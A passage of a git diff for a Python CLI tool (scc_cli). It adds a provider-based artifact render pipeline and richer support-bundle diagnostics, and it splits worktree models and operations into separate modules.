presentation layer can display diagnostics. + + Returns: + Tuple of (render_results, error_message). On success error_message + is None. On failure render_results is empty. + """ + # Gate: skip bundle pipeline when prerequisites are absent + if request.dry_run or request.offline or request.standalone: + return (), None + if request.org_config is None or request.team is None: + return (), None + provider = dependencies.agent_provider + if provider is None: + return (), None + + provider_id = provider.capability_profile().provider_id + + # 1. Resolve render plans from org config + team + provider + try: + resolution: BundleResolutionResult = resolve_render_plan( + org_config=request.org_config, + team_name=request.team, + provider=provider_id, + fail_closed=True, + ) + except (ValueError, RendererError) as exc: + logger.warning("Bundle resolution failed: %s", exc) + return (), str(exc) + + if not resolution.plans: + if resolution.diagnostics: + diag_msgs = [d.reason for d in resolution.diagnostics] + logger.info("Bundle resolution produced no plans: %s", diag_msgs) + return (), None + + # Log diagnostics from resolution + for diag in resolution.diagnostics: + logger.info("Bundle resolution diagnostic: %s — %s", diag.artifact_name, diag.reason) + + # 2. Render each plan through the provider adapter + all_results: list[RenderArtifactsResult] = [] + for plan in resolution.plans: + if not plan.effective_artifacts and not plan.bindings: + logger.info( + "Skipping empty render plan for bundle '%s' (no effective artifacts)", + plan.bundle_id, + ) + continue + try: + result = provider.render_artifacts(plan, workspace) + except RendererError as exc: + # Fail-closed: capture and return the error + logger.error( + "Artifact rendering failed for bundle '%s': %s", + plan.bundle_id, + exc, + ) + return (), str(exc) + + all_results.append(result) + + # 3. Log/audit rendered artifacts + for path in result.rendered_paths: + logger.info("Rendered artifact: %s", path) + for warning in result.warnings: + logger.warning("Renderer warning: %s", warning) + for skipped in result.skipped_artifacts: + logger.info("Skipped artifact: %s", skipped) + + return tuple(all_results), None + + +def _build_agent_launch_spec( + *, + request: StartSessionRequest, + agent_settings: AgentSettings | None, + dependencies: StartSessionDependencies, +) -> AgentLaunchSpec | None: + """Delegate launch spec construction to the provider adapter. + + Returns None when no provider is wired (backward compat) or in dry-run mode. + The provider resolves its own argv, env, and artifact paths from the settings + artifact already built by the sync/build_agent_settings path. + """ + if request.dry_run: + return None + provider = dependencies.agent_provider + if provider is None: + return None + settings_path = agent_settings.path if agent_settings is not None else None + # D035: config content is already serialised inside agent_settings.rendered_bytes. + # Providers do not consume the config dict — they use settings_path for + # artifact_paths only. Pass an empty dict to satisfy the protocol signature. + return provider.prepare_launch( + config={}, + workspace=request.workspace_path, + settings_path=settings_path, ) diff --git a/src/scc_cli/application/support_bundle.py b/src/scc_cli/application/support_bundle.py index 92ad37d..8663e7d 100644 --- a/src/scc_cli/application/support_bundle.py +++ b/src/scc_cli/application/support_bundle.py @@ -5,17 +5,23 @@ import json import re from dataclasses import dataclass +from datetime import datetime from pathlib import Path from typing import Any -from scc_cli import __version__ +from scc_cli import __version__, config +from scc_cli.application.launch.audit_log import read_launch_audit_diagnostics +from scc_cli.application.safety_audit import read_safety_audit_diagnostics from scc_cli.core.errors import SCCError +from scc_cli.core.safety_policy_loader import load_safety_policy from scc_cli.doctor.serialization import build_doctor_json_data from scc_cli.ports.archive_writer import ArchiveWriter from scc_cli.ports.clock import Clock from scc_cli.ports.doctor_runner import DoctorRunner from scc_cli.ports.filesystem import Filesystem +SUPPORT_BUNDLE_AUDIT_LIMIT = 5 + # ───────────────────────────────────────────────────────────────────────────── # Redaction Patterns and Helpers # ───────────────────────────────────────────────────────────────────────────── @@ -111,6 +117,16 @@ def redact_paths(data: dict[str, Any], *, redact: bool = True) -> dict[str, Any] # ───────────────────────────────────────────────────────────────────────────── +def get_default_support_bundle_path( + *, + working_directory: Path | None = None, + current_time: datetime | None = None, +) -> Path: + """Return the default output path for a support bundle archive.""" + timestamp = (current_time or datetime.now()).strftime("%Y%m%d-%H%M%S") + return (working_directory or Path.cwd()) / f"scc-support-bundle-{timestamp}.zip" + + @dataclass(frozen=True) class SupportBundleDependencies: """Dependencies for the support bundle use case.""" @@ -119,6 +135,20 @@ class SupportBundleDependencies: clock: Clock doctor_runner: DoctorRunner archive_writer: ArchiveWriter + launch_audit_path: Path = config.LAUNCH_AUDIT_FILE + + +def build_default_support_bundle_dependencies() -> SupportBundleDependencies: + """Build support-bundle dependencies from the composition root.""" + from scc_cli.bootstrap import get_default_adapters + + adapters = get_default_adapters() + return SupportBundleDependencies( + filesystem=adapters.filesystem, + clock=adapters.clock, + doctor_runner=adapters.doctor_runner, + archive_writer=adapters.archive_writer, + ) @dataclass(frozen=True) @@ -137,6 +167,14 @@ class SupportBundleResult: manifest: dict[str, Any] +def _load_raw_org_config_for_bundle() -> dict[str, Any] | None: + """Load raw org config for the safety section (fail-safe).""" + try: + return config.load_cached_org_config() + except Exception: + return None + + def _load_user_config(filesystem: Filesystem, path: Path) -> dict[str, Any]: try: if not filesystem.exists(path): @@ -150,6 +188,19 @@ def _load_user_config(filesystem: Filesystem, path: Path) -> dict[str, Any]: return {"error": "Failed to load config"} +def _build_launch_audit_manifest_section( + *, + audit_path: Path, + redact_paths_flag: bool, +) -> dict[str, Any]: + diagnostics = read_launch_audit_diagnostics( + audit_path=audit_path, + limit=SUPPORT_BUNDLE_AUDIT_LIMIT, + redact_paths=redact_paths_flag, + ) + return diagnostics.to_dict() + + def build_support_bundle_manifest( request: SupportBundleRequest, *, @@ -183,13 +234,108 @@ def build_support_bundle_manifest( except Exception as exc: doctor_data = {"error": f"Failed to run doctor: {exc}"} + try: + launch_audit = _build_launch_audit_manifest_section( + audit_path=dependencies.launch_audit_path, + redact_paths_flag=request.redact_paths, + ) + except Exception as exc: + launch_audit = { + "sink_path": str(dependencies.launch_audit_path), + "state": "unavailable", + "requested_limit": SUPPORT_BUNDLE_AUDIT_LIMIT, + "scanned_line_count": 0, + "malformed_line_count": 0, + "last_malformed_line": None, + "recent_events": [], + "last_failure": None, + "error": f"Failed to read launch audit: {exc}", + } + if request.redact_paths: + launch_audit = redact_paths(launch_audit) + + # Effective egress diagnostics + runtime_backend = "unavailable" + try: + from scc_cli.bootstrap import get_default_adapters + + adapters = get_default_adapters() + probe = adapters.runtime_probe + if probe is not None: + probe_info = probe.probe() + runtime_backend = probe_info.preferred_backend or "unavailable" + except Exception: + pass + + network_policy: str | None = None + try: + if isinstance(user_config, dict): + network_policy = user_config.get("network_policy") or user_config.get( + "network", {} + ).get("policy") + except Exception: + pass + + resolved_destination_sets: list[str] = [] + try: + from scc_cli.core.destination_registry import PROVIDER_DESTINATION_SETS + + resolved_destination_sets = sorted(PROVIDER_DESTINATION_SETS.keys()) + except Exception: + pass + + effective_egress: dict[str, Any] = { + "runtime_backend": runtime_backend, + "network_policy": network_policy, + "resolved_destination_sets": resolved_destination_sets, + } + + # Safety: effective policy + recent safety audit events + try: + raw_org_config = _load_raw_org_config_for_bundle() + policy = load_safety_policy(raw_org_config) + safety_audit_diag = read_safety_audit_diagnostics( + audit_path=dependencies.launch_audit_path, + limit=SUPPORT_BUNDLE_AUDIT_LIMIT, + redact_paths=request.redact_paths, + ) + safety_section: dict[str, Any] = { + "effective_policy": { + "action": policy.action, + "source": policy.source, + }, + "recent_audit": safety_audit_diag.to_dict(), + } + except Exception as exc: + safety_section = {"error": f"Failed to load safety diagnostics: {exc}"} + + # Governed-artifact diagnostics + try: + from scc_cli.doctor.checks.artifacts import build_artifact_diagnostics_summary + + artifact_diagnostics: dict[str, Any] = build_artifact_diagnostics_summary() + except Exception as exc: + artifact_diagnostics = {"error": f"Failed to load artifact diagnostics: {exc}"} + + # Resolve provider_id for the bundle manifest + selected_provider: str | None = None + try: + selected_provider = config.get_selected_provider() + except Exception: + pass + bundle_data: dict[str, Any] = { "generated_at": generated_at, "cli_version": __version__, + "provider_id": selected_provider, "system": system_info, "config": user_config, "org_config": org_config, "doctor": doctor_data, + "launch_audit": launch_audit, + "effective_egress": effective_egress, + "safety": safety_section, + "governed_artifacts": artifact_diagnostics, } if request.workspace_path: diff --git a/src/scc_cli/application/sync_marketplace.py b/src/scc_cli/application/sync_marketplace.py index 87d5fa0..72f75ce 100644 --- a/src/scc_cli/application/sync_marketplace.py +++ b/src/scc_cli/application/sync_marketplace.py @@ -1,4 +1,4 @@ -"""Marketplace sync use case for Claude Code integration.""" +"""Marketplace sync use case for agent integration.""" from __future__ import annotations diff --git a/src/scc_cli/application/worktree/__init__.py b/src/scc_cli/application/worktree/__init__.py index e6a062a..6dccb73 100644 --- a/src/scc_cli/application/worktree/__init__.py +++ b/src/scc_cli/application/worktree/__init__.py @@ -1,6 +1,6 @@ """Worktree application use cases.""" -from scc_cli.application.worktree.use_cases import ( +from scc_cli.application.worktree.models import ( ShellCommand, WorktreeConfirmation, WorktreeCreateRequest, @@ -17,8 +17,12 @@ WorktreeSummary, WorktreeSwitchRequest, WorktreeWarningOutcome, +) +from scc_cli.application.worktree.operations import ( create_worktree, enter_worktree_shell, +) +from scc_cli.application.worktree.use_cases import ( list_worktrees, select_worktree, switch_worktree, diff --git a/src/scc_cli/application/worktree/models.py b/src/scc_cli/application/worktree/models.py new file mode 100644 index 0000000..aae5219 --- /dev/null +++ b/src/scc_cli/application/worktree/models.py @@ -0,0 +1,363 @@ +"""Worktree domain models and request/result dataclasses.""" + +from __future__ import annotations + +from dataclasses import dataclass +from enum import Enum +from pathlib import Path +from typing import TypeAlias + +from scc_cli.application.interaction_requests import ConfirmRequest, SelectRequest +from scc_cli.ports.dependency_installer import DependencyInstaller +from scc_cli.ports.git_client import GitClient +from scc_cli.services.git.worktree import WorktreeInfo + + +@dataclass(frozen=True) +class WorktreeSummary: + """Summary of a git worktree for selection and listing. + + Invariants: + - Paths are absolute and refer to host filesystem locations. + - Counts are zero when status data is unavailable. + + Args: + path: Filesystem path to the worktree. + branch: Branch name (may be empty for detached/bare worktrees). + status: Raw status string from git worktree list. + is_current: Whether this worktree matches the current working directory. + has_changes: Whether the worktree has staged/modified/untracked files. + staged_count: Number of staged files. + modified_count: Number of modified files. + untracked_count: Number of untracked files. + status_timed_out: Whether status collection timed out. + """ + + path: Path + branch: str + status: str + is_current: bool + has_changes: bool + staged_count: int + modified_count: int + untracked_count: int + status_timed_out: bool + + @classmethod + def from_info( + cls, + info: WorktreeInfo, + *, + path: Path, + is_current: bool, + staged_count: int, + modified_count: int, + untracked_count: int, + status_timed_out: bool, + has_changes: bool, + ) -> WorktreeSummary: + """Build a WorktreeSummary from a WorktreeInfo record.""" + return cls( + path=path, + branch=info.branch, + status=info.status, + is_current=is_current, + has_changes=has_changes, + staged_count=staged_count, + modified_count=modified_count, + untracked_count=untracked_count, + status_timed_out=status_timed_out, + ) + + +@dataclass(frozen=True) +class WorktreeListRequest: + """Inputs for listing worktrees. + + Invariants: + - Current directory is provided for stable current-worktree detection. + + Args: + workspace_path: Repository root path. + verbose: Whether to include git status counts. + current_dir: Current working directory for current-worktree detection. + """ + + workspace_path: Path + verbose: bool + current_dir: Path + + +@dataclass(frozen=True) +class WorktreeListResult: + """Worktree list output for rendering at the edge. + + Invariants: + - Worktrees preserve the ordering returned by git. + + Args: + workspace_path: Repository root path. + worktrees: Tuple of worktree summaries. + """ + + workspace_path: Path + worktrees: tuple[WorktreeSummary, ...] + + +@dataclass(frozen=True) +class WorktreeSelectionItem: + """Selectable worktree or branch entry. + + Invariants: + - Branch-only entries have no worktree path. + + Args: + item_id: Stable identifier for selection tracking. + branch: Branch name associated with the item. + worktree: Worktree summary if this item represents a worktree. + is_branch_only: True when this item represents a branch without worktree. + """ + + item_id: str + branch: str + worktree: WorktreeSummary | None + is_branch_only: bool + + @property + def path(self) -> Path | None: + """Return the worktree path if present.""" + if not self.worktree: + return None + return self.worktree.path + + +@dataclass(frozen=True) +class WorktreeSelectionPrompt: + """Selection prompt metadata for interactive worktree choices. + + Invariants: + - Selection options must map to WorktreeSelectionItem values. + + Args: + request: SelectRequest describing the options. + initial_filter: Optional query used to seed interactive filters. + """ + + request: SelectRequest[WorktreeSelectionItem] + initial_filter: str = "" + + +@dataclass(frozen=True) +class WorktreeWarning: + """User-facing warning metadata. + + Invariants: + - Titles and messages remain stable for characterization tests. + + Args: + title: Warning title for panel rendering. + message: Warning body text. + suggestion: Optional follow-up guidance. + """ + + title: str + message: str + suggestion: str | None = None + + +@dataclass(frozen=True) +class WorktreeWarningOutcome: + """Warning outcome with an exit code hint. + + Args: + warning: Warning metadata to render. + exit_code: Suggested exit code for the command. + """ + + warning: WorktreeWarning + exit_code: int = 1 + + +class WorktreeConfirmAction(str, Enum): + """Confirm action identifiers for worktree flows.""" + + CREATE_WORKTREE = "create-worktree" + + +@dataclass(frozen=True) +class WorktreeConfirmation: + """Confirmation request for follow-up actions. + + Invariants: + - Prompts mirror existing CLI confirmations. + + Args: + action: Action that requires confirmation. + request: ConfirmRequest describing the prompt. + default_response: Default response value for UI adapters. + branch_name: Optional branch name for creation actions. + """ + + action: WorktreeConfirmAction + request: ConfirmRequest + default_response: bool + branch_name: str | None = None + + +@dataclass(frozen=True) +class WorktreeResolution: + """Resolved worktree path for shell integration. + + Args: + worktree_path: Resolved worktree path to output. + worktree_name: Optional worktree name for environment configuration. + """ + + worktree_path: Path + worktree_name: str | None = None + + +@dataclass(frozen=True) +class WorktreeCreateRequest: + """Inputs for creating a new worktree. + + Invariants: + - Name is sanitized for branch creation. + - Base branch defaults follow git default branch logic. + + Args: + workspace_path: Repository root path. + name: Worktree name (feature name). + base_branch: Optional base branch override. + install_dependencies: Whether to install dependencies after creation. + """ + + workspace_path: Path + name: str + base_branch: str | None + install_dependencies: bool = True + + +@dataclass(frozen=True) +class WorktreeCreateResult: + """Result of creating a new worktree. + + Args: + worktree_path: Filesystem path to the created worktree. + worktree_name: Sanitized worktree name. + branch_name: Full branch name created for the worktree. + base_branch: Base branch used for the worktree. + dependencies_installed: Whether dependency installation succeeded. + """ + + worktree_path: Path + worktree_name: str + branch_name: str + base_branch: str + dependencies_installed: bool | None + + +@dataclass(frozen=True) +class ShellCommand: + """Shell command specification for entering a worktree.""" + + argv: list[str] + workdir: Path + env: dict[str, str] + + +@dataclass(frozen=True) +class WorktreeShellResult: + """Shell entry details for a worktree.""" + + shell_command: ShellCommand + worktree_path: Path + worktree_name: str + + +WorktreeSelectOutcome: TypeAlias = ( + WorktreeResolution + | WorktreeSelectionPrompt + | WorktreeWarningOutcome + | WorktreeConfirmation + | WorktreeCreateResult +) +WorktreeSwitchOutcome: TypeAlias = WorktreeSelectOutcome +WorktreeEnterOutcome: TypeAlias = ( + WorktreeShellResult | WorktreeSelectionPrompt | WorktreeWarningOutcome +) + + +@dataclass(frozen=True) +class WorktreeDependencies: + """Dependencies for worktree use cases.""" + + git_client: GitClient + dependency_installer: DependencyInstaller + + +@dataclass(frozen=True) +class WorktreeSelectRequest: + """Inputs for selecting a worktree or branch. + + Args: + workspace_path: Repository root path. + include_branches: Whether to include branches without worktrees. + current_dir: Current working directory for current-worktree detection. + selection: Selected item from a prior prompt (if any). + confirm_create: Confirmation response for branch creation. + """ + + workspace_path: Path + include_branches: bool + current_dir: Path + selection: WorktreeSelectionItem | None = None + confirm_create: bool | None = None + + +@dataclass(frozen=True) +class WorktreeSwitchRequest: + """Inputs for switching to a worktree. + + Args: + workspace_path: Repository root path. + target: Target name or shortcut. + oldpwd: Shell OLDPWD value for '-' shortcut. + interactive_allowed: Whether prompts may be shown. + current_dir: Current working directory for current-worktree detection. + selection: Selected item from a prior prompt (if any). + confirm_create: Confirmation response for branch creation. + """ + + workspace_path: Path + target: str | None + oldpwd: str | None + interactive_allowed: bool + current_dir: Path + selection: WorktreeSelectionItem | None = None + confirm_create: bool | None = None + + +@dataclass(frozen=True) +class WorktreeEnterRequest: + """Inputs for entering a worktree in a subshell. + + Args: + workspace_path: Repository root path. + target: Target name or shortcut. + oldpwd: Shell OLDPWD value for '-' shortcut. + interactive_allowed: Whether prompts may be shown. + current_dir: Current working directory for current-worktree detection. + env: Environment mapping for shell resolution. + platform_system: Platform system name (e.g., "Windows", "Linux"). + selection: Selected item from a prior prompt (if any). + """ + + workspace_path: Path + target: str | None + oldpwd: str | None + interactive_allowed: bool + current_dir: Path + env: dict[str, str] + platform_system: str + selection: WorktreeSelectionItem | None = None diff --git a/src/scc_cli/application/worktree/operations.py b/src/scc_cli/application/worktree/operations.py new file mode 100644 index 0000000..fefd193 --- /dev/null +++ b/src/scc_cli/application/worktree/operations.py @@ -0,0 +1,317 @@ +"""Worktree creation and shell-entry operations.""" + +from __future__ import annotations + +from pathlib import Path + +from scc_cli.application.worktree.models import ( + ShellCommand, + WorktreeCreateRequest, + WorktreeCreateResult, + WorktreeDependencies, + WorktreeEnterOutcome, + WorktreeEnterRequest, + WorktreeListRequest, + WorktreeSelectionItem, + WorktreeShellResult, + WorktreeSummary, + WorktreeWarning, + WorktreeWarningOutcome, +) +from scc_cli.core.constants import WORKTREE_BRANCH_PREFIX +from scc_cli.core.errors import NotAGitRepoError, WorktreeCreationError +from scc_cli.ports.git_client import GitClient +from scc_cli.services.git.branch import sanitize_branch_name +from scc_cli.utils.locks import file_lock, lock_path + + +def enter_worktree_shell( + request: WorktreeEnterRequest, + *, + dependencies: WorktreeDependencies, +) -> WorktreeEnterOutcome: + """Resolve a worktree target into a shell command. + + Invariants: + - Shell resolution mirrors platform defaults. + - Worktree existence is verified before returning a command. + + Raises: + WorkspaceNotFoundError: If the workspace path does not exist. + NotAGitRepoError: If the workspace is not a git repository. + """ + from scc_cli.application.worktree.use_cases import ( + _require_workspace, + list_worktrees, + ) + + _require_workspace(request.workspace_path) + if not dependencies.git_client.is_git_repo(request.workspace_path): + raise NotAGitRepoError(path=str(request.workspace_path)) + + if request.selection is not None: + return _build_shell_result(request, request.selection) + + if request.target is None: + worktrees = list_worktrees( + WorktreeListRequest( + workspace_path=request.workspace_path, + verbose=False, + current_dir=request.current_dir, + ), + git_client=dependencies.git_client, + ).worktrees + if not worktrees: + return WorktreeWarningOutcome( + WorktreeWarning( + title="No Worktrees", + message="No worktrees found for this repository.", + suggestion="Create one with: scc worktree create ", + ) + ) + return _build_select_request_prompt(worktrees, dependencies, request) + + if request.target == "-": + if not request.oldpwd: + return WorktreeWarningOutcome( + WorktreeWarning( + title="No Previous Directory", + message="Shell $OLDPWD is not set.", + suggestion="This typically means you haven't changed directories yet.", + ) + ) + selection = WorktreeSelectionItem( + item_id="oldpwd", + branch=Path(request.oldpwd).name, + worktree=WorktreeSummary( + path=Path(request.oldpwd), + branch=Path(request.oldpwd).name, + status="", + is_current=False, + has_changes=False, + staged_count=0, + modified_count=0, + untracked_count=0, + status_timed_out=False, + ), + is_branch_only=False, + ) + return _build_shell_result(request, selection) + + if request.target == "^": + default_branch = dependencies.git_client.get_default_branch(request.workspace_path) + worktrees = list_worktrees( + WorktreeListRequest( + workspace_path=request.workspace_path, + verbose=False, + current_dir=request.current_dir, + ), + git_client=dependencies.git_client, + ).worktrees + selected = None + for worktree in worktrees: + if worktree.branch == default_branch or worktree.branch in {"main", "master"}: + selected = worktree + break + if not selected: + return WorktreeWarningOutcome( + WorktreeWarning( + title="Main Branch Not Found", + message=f"No worktree found for main branch ({default_branch}).", + suggestion="The main worktree may be in a different location.", + ) + ) + selection = WorktreeSelectionItem( + item_id=f"worktree:{selected.path}", + branch=selected.branch or selected.path.name, + worktree=selected, + is_branch_only=False, + ) + return _build_shell_result(request, selection) + + matched, _matches = dependencies.git_client.find_worktree_by_query( + request.workspace_path, request.target + ) + if not matched: + return WorktreeWarningOutcome( + WorktreeWarning( + title="Worktree Not Found", + message=f"No worktree matching '{request.target}'.", + suggestion="Run 'scc worktree list' to see available worktrees.", + ) + ) + selection = WorktreeSelectionItem( + item_id=f"worktree:{matched.path}", + branch=matched.branch or Path(matched.path).name, + worktree=WorktreeSummary( + path=Path(matched.path), + branch=matched.branch, + status=matched.status, + is_current=False, + has_changes=matched.has_changes, + staged_count=matched.staged_count, + modified_count=matched.modified_count, + untracked_count=matched.untracked_count, + status_timed_out=matched.status_timed_out, + ), + is_branch_only=False, + ) + return _build_shell_result(request, selection) + + +def _build_select_request_prompt( + worktrees: tuple[WorktreeSummary, ...], + dependencies: WorktreeDependencies, + request: WorktreeEnterRequest, +) -> WorktreeEnterOutcome: + """Build a selection prompt for enter_worktree_shell.""" + from scc_cli.application.worktree.models import WorktreeSelectionPrompt + from scc_cli.application.worktree.use_cases import _build_select_request, _build_selection_items + + return WorktreeSelectionPrompt( + request=_build_select_request( + request_id="worktree-enter", + title="Enter Worktree", + subtitle="Select a worktree to enter", + items=_build_selection_items(worktrees, []), + ) + ) + + +def create_worktree( + request: WorktreeCreateRequest, + *, + dependencies: WorktreeDependencies, +) -> WorktreeCreateResult: + """Create a worktree using git and dependency installer ports. + + Invariants: + - Uses the same branch naming and lock behavior as the CLI. + - Cleans up partially created worktrees on failure. + + Raises: + NotAGitRepoError: If the workspace is not a git repository. + WorktreeCreationError: If worktree creation fails. + """ + if not dependencies.git_client.is_git_repo(request.workspace_path): + raise NotAGitRepoError(path=str(request.workspace_path)) + + safe_name = sanitize_branch_name(request.name) + if not safe_name: + raise ValueError(f"Invalid worktree name: {request.name!r}") + + branch_name = f"{WORKTREE_BRANCH_PREFIX}{safe_name}" + worktree_base = request.workspace_path.parent / f"{request.workspace_path.name}-worktrees" + worktree_path = worktree_base / safe_name + + lock_file = lock_path("worktree", request.workspace_path) + with file_lock(lock_file): + if worktree_path.exists(): + raise WorktreeCreationError( + name=safe_name, + user_message=f"Worktree already exists: {worktree_path}", + suggested_action="Use existing worktree, remove it first, or choose a different name", + ) + + base_branch = request.base_branch or dependencies.git_client.get_default_branch( + request.workspace_path + ) + + if dependencies.git_client.has_remote(request.workspace_path): + dependencies.git_client.fetch_branch(request.workspace_path, base_branch) + + worktree_created = False + try: + dependencies.git_client.add_worktree( + request.workspace_path, + worktree_path, + branch_name, + base_branch, + ) + worktree_created = True + + dependencies_installed = None + if request.install_dependencies: + install_result = dependencies.dependency_installer.install(worktree_path) + if install_result.attempted and not install_result.success: + raise WorktreeCreationError( + name=safe_name, + user_message="Dependency install failed for the new worktree", + suggested_action="Install dependencies manually and retry if needed", + ) + if install_result.attempted: + dependencies_installed = install_result.success + + return WorktreeCreateResult( + worktree_path=worktree_path, + worktree_name=safe_name, + branch_name=branch_name, + base_branch=base_branch, + dependencies_installed=dependencies_installed, + ) + except KeyboardInterrupt: + if worktree_created or worktree_path.exists(): + _cleanup_partial_worktree( + request.workspace_path, worktree_path, dependencies.git_client + ) + raise + except WorktreeCreationError: + if worktree_created or worktree_path.exists(): + _cleanup_partial_worktree( + request.workspace_path, worktree_path, dependencies.git_client + ) + raise + except Exception as exc: + if worktree_created or worktree_path.exists(): + _cleanup_partial_worktree( + request.workspace_path, worktree_path, dependencies.git_client + ) + raise WorktreeCreationError( + name=safe_name, + user_message=f"Failed to create worktree: {safe_name}", + suggested_action="Check if the branch already exists or if there are uncommitted changes", + command=str(getattr(exc, "cmd", "")) or None, + ) from exc + + +def _cleanup_partial_worktree(repo_path: Path, worktree_path: Path, git_client: GitClient) -> None: + try: + git_client.remove_worktree(repo_path, worktree_path, force=True) + except Exception: + pass + try: + git_client.prune_worktrees(repo_path) + except Exception: + pass + + +def _build_shell_result( + request: WorktreeEnterRequest, + selection: WorktreeSelectionItem, +) -> WorktreeShellResult | WorktreeWarningOutcome: + if not selection.path: + raise ValueError("Selection must include a worktree path") + + if not selection.path.exists(): + return WorktreeWarningOutcome( + WorktreeWarning( + title="Worktree Missing", + message=f"Worktree path does not exist: {selection.path}", + suggestion="The worktree may have been removed. Run 'scc worktree prune'.", + ) + ) + + env = dict(request.env) + worktree_name = selection.branch or selection.path.name + env["SCC_WORKTREE"] = worktree_name + + if request.platform_system == "Windows": + shell = env.get("COMSPEC", "cmd.exe") + else: + shell = env.get("SHELL", "/bin/bash") + + return WorktreeShellResult( + shell_command=ShellCommand(argv=[shell], workdir=selection.path, env=env), + worktree_path=selection.path, + worktree_name=worktree_name, + ) diff --git a/src/scc_cli/application/worktree/use_cases.py b/src/scc_cli/application/worktree/use_cases.py index 94377ea..63a5e55 100644 --- a/src/scc_cli/application/worktree/use_cases.py +++ b/src/scc_cli/application/worktree/use_cases.py @@ -4,370 +4,47 @@ import os from collections.abc import Iterable, Sequence -from dataclasses import dataclass -from enum import Enum from pathlib import Path -from typing import TypeAlias from scc_cli.application.interaction_requests import ConfirmRequest, SelectOption, SelectRequest -from scc_cli.core.constants import WORKTREE_BRANCH_PREFIX -from scc_cli.core.errors import NotAGitRepoError, WorkspaceNotFoundError, WorktreeCreationError -from scc_cli.core.exit_codes import EXIT_CANCELLED -from scc_cli.ports.dependency_installer import DependencyInstaller -from scc_cli.ports.git_client import GitClient -from scc_cli.services.git.branch import get_display_branch, sanitize_branch_name -from scc_cli.services.git.worktree import WorktreeInfo -from scc_cli.utils.locks import file_lock, lock_path - - -@dataclass(frozen=True) -class WorktreeSummary: - """Summary of a git worktree for selection and listing. - - Invariants: - - Paths are absolute and refer to host filesystem locations. - - Counts are zero when status data is unavailable. - - Args: - path: Filesystem path to the worktree. - branch: Branch name (may be empty for detached/bare worktrees). - status: Raw status string from git worktree list. - is_current: Whether this worktree matches the current working directory. - has_changes: Whether the worktree has staged/modified/untracked files. - staged_count: Number of staged files. - modified_count: Number of modified files. - untracked_count: Number of untracked files. - status_timed_out: Whether status collection timed out. - """ - - path: Path - branch: str - status: str - is_current: bool - has_changes: bool - staged_count: int - modified_count: int - untracked_count: int - status_timed_out: bool - - @classmethod - def from_info( - cls, - info: WorktreeInfo, - *, - path: Path, - is_current: bool, - staged_count: int, - modified_count: int, - untracked_count: int, - status_timed_out: bool, - has_changes: bool, - ) -> WorktreeSummary: - """Build a WorktreeSummary from a WorktreeInfo record.""" - return cls( - path=path, - branch=info.branch, - status=info.status, - is_current=is_current, - has_changes=has_changes, - staged_count=staged_count, - modified_count=modified_count, - untracked_count=untracked_count, - status_timed_out=status_timed_out, - ) - - -@dataclass(frozen=True) -class WorktreeListRequest: - """Inputs for listing worktrees. - - Invariants: - - Current directory is provided for stable current-worktree detection. - - Args: - workspace_path: Repository root path. - verbose: Whether to include git status counts. - current_dir: Current working directory for current-worktree detection. - """ - - workspace_path: Path - verbose: bool - current_dir: Path - - -@dataclass(frozen=True) -class WorktreeListResult: - """Worktree list output for rendering at the edge. - - Invariants: - - Worktrees preserve the ordering returned by git. - - Args: - workspace_path: Repository root path. - worktrees: Tuple of worktree summaries. - """ - - workspace_path: Path - worktrees: tuple[WorktreeSummary, ...] - - -@dataclass(frozen=True) -class WorktreeSelectionItem: - """Selectable worktree or branch entry. - - Invariants: - - Branch-only entries have no worktree path. - - Args: - item_id: Stable identifier for selection tracking. - branch: Branch name associated with the item. - worktree: Worktree summary if this item represents a worktree. - is_branch_only: True when this item represents a branch without worktree. - """ - - item_id: str - branch: str - worktree: WorktreeSummary | None - is_branch_only: bool - - @property - def path(self) -> Path | None: - """Return the worktree path if present.""" - if not self.worktree: - return None - return self.worktree.path - - -@dataclass(frozen=True) -class WorktreeSelectionPrompt: - """Selection prompt metadata for interactive worktree choices. - - Invariants: - - Selection options must map to WorktreeSelectionItem values. - - Args: - request: SelectRequest describing the options. - initial_filter: Optional query used to seed interactive filters. - """ - - request: SelectRequest[WorktreeSelectionItem] - initial_filter: str = "" - - -@dataclass(frozen=True) -class WorktreeWarning: - """User-facing warning metadata. - - Invariants: - - Titles and messages remain stable for characterization tests. - - Args: - title: Warning title for panel rendering. - message: Warning body text. - suggestion: Optional follow-up guidance. - """ - - title: str - message: str - suggestion: str | None = None - - -@dataclass(frozen=True) -class WorktreeWarningOutcome: - """Warning outcome with an exit code hint. - - Args: - warning: Warning metadata to render. - exit_code: Suggested exit code for the command. - """ - - warning: WorktreeWarning - exit_code: int = 1 - - -class WorktreeConfirmAction(str, Enum): - """Confirm action identifiers for worktree flows.""" - - CREATE_WORKTREE = "create-worktree" - -@dataclass(frozen=True) -class WorktreeConfirmation: - """Confirmation request for follow-up actions. - - Invariants: - - Prompts mirror existing CLI confirmations. - - Args: - action: Action that requires confirmation. - request: ConfirmRequest describing the prompt. - default_response: Default response value for UI adapters. - branch_name: Optional branch name for creation actions. - """ - - action: WorktreeConfirmAction - request: ConfirmRequest - default_response: bool - branch_name: str | None = None - - -@dataclass(frozen=True) -class WorktreeResolution: - """Resolved worktree path for shell integration. - - Args: - worktree_path: Resolved worktree path to output. - worktree_name: Optional worktree name for environment configuration. - """ - - worktree_path: Path - worktree_name: str | None = None - - -@dataclass(frozen=True) -class WorktreeCreateRequest: - """Inputs for creating a new worktree. - - Invariants: - - Name is sanitized for branch creation. - - Base branch defaults follow git default branch logic. - - Args: - workspace_path: Repository root path. - name: Worktree name (feature name). - base_branch: Optional base branch override. - install_dependencies: Whether to install dependencies after creation. - """ - - workspace_path: Path - name: str - base_branch: str | None - install_dependencies: bool = True - - -@dataclass(frozen=True) -class WorktreeCreateResult: - """Result of creating a new worktree. - - Args: - worktree_path: Filesystem path to the created worktree. - worktree_name: Sanitized worktree name. - branch_name: Full branch name created for the worktree. - base_branch: Base branch used for the worktree. - dependencies_installed: Whether dependency installation succeeded. - """ - - worktree_path: Path - worktree_name: str - branch_name: str - base_branch: str - dependencies_installed: bool | None - - -@dataclass(frozen=True) -class ShellCommand: - """Shell command specification for entering a worktree.""" - - argv: list[str] - workdir: Path - env: dict[str, str] - - -@dataclass(frozen=True) -class WorktreeShellResult: - """Shell entry details for a worktree.""" - - shell_command: ShellCommand - worktree_path: Path - worktree_name: str - - -WorktreeSelectOutcome: TypeAlias = ( - WorktreeResolution - | WorktreeSelectionPrompt - | WorktreeWarningOutcome - | WorktreeConfirmation - | WorktreeCreateResult -) -WorktreeSwitchOutcome: TypeAlias = WorktreeSelectOutcome -WorktreeEnterOutcome: TypeAlias = ( - WorktreeShellResult | WorktreeSelectionPrompt | WorktreeWarningOutcome +# Re-export all models for backward 